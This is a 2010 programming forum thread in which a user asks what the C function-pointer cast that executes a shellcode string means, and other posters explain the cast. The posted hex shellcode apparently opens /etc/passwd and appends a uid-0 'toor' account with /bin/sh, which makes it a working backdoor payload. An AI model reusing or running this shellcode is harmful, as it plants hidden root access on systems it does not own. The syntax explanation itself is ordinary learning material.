Questions about programming languages and debugging
shan75
On the way to fame!
Posts: 32 Joined: 03 Dec 2009, 17:00
14
Location: india
Contact:
Post
by shan75 » 25 Oct 2010, 12:26
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x52\x68\x73\x73\x77"
"\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x41"
"\x04\x66\xba\x80\x01\x6a\x05\x58\xcd\x80\x89\xc3\x31\xc0\x50\x66"
"\x68\x68\x0a\x68\x69\x6e\x2f\x73\x68\x2f\x3a\x2f\x62\x68\x3a\x30"
"\x3a\x3a\x68\x48\x55\x3a\x30\x68\x72\x32\x69\x7a\x68\x44\x7a\x33"
"\x71\x68\x3a\x47\x66\x2e\x68\x74\x6f\x6f\x72\x89\xe1\x6a\x22\x5a"
"\xb0\x04\xcd\x80\x6a\x06\x58\xcd\x80";
int main()
{
printf("[*] Shellcode - length: %d\n", strlen(shellcode));
(*(void(*)())shellcode)();
return 0;
}
this is a shellcode.. but i cant understand
(*(void(*)())shellcode)(); this line what is it actually mean funtion poiner or what?? please explain me..
thanx
Gogeta70
^_^
Posts: 3275 Joined: 25 Jun 2005, 16:00
18
Post
by Gogeta70 » 25 Oct 2010, 17:39
Well it's definitely a call to execute the shellcode, what confuses me the most is the pointer/dereference operator. So i can't really tell you for sure what that line does.
¯\_(ツ)_/¯ It works on my machine...
shan75
On the way to fame!
Posts: 32 Joined: 03 Dec 2009, 17:00
14
Location: india
Contact:
Post
by shan75 » 26 Oct 2010, 11:41
anyone else can help me??
Lundis
Distorter of Reality
Posts: 543 Joined: 22 Aug 2008, 16:00
15
Location: Deadlock of Awesome
Contact:
Post
by Lundis » 26 Oct 2010, 13:05
It casts the pointer to a function returning and taking no arguments and calls it. It's a bit clearer if you write it on multiple lines:
Code: Select all
int main()
{
printf("[*] Shellcode - length: %d\n", strlen(shellcode));
// cast the string to a function pointer
void (*func)() = (void(*)())shellcode;
//dereference the function pointer and call the function
(*func)();
return 0;
}
Derefencing it is optional (on gcc at least) and doesn't really make any sense to me.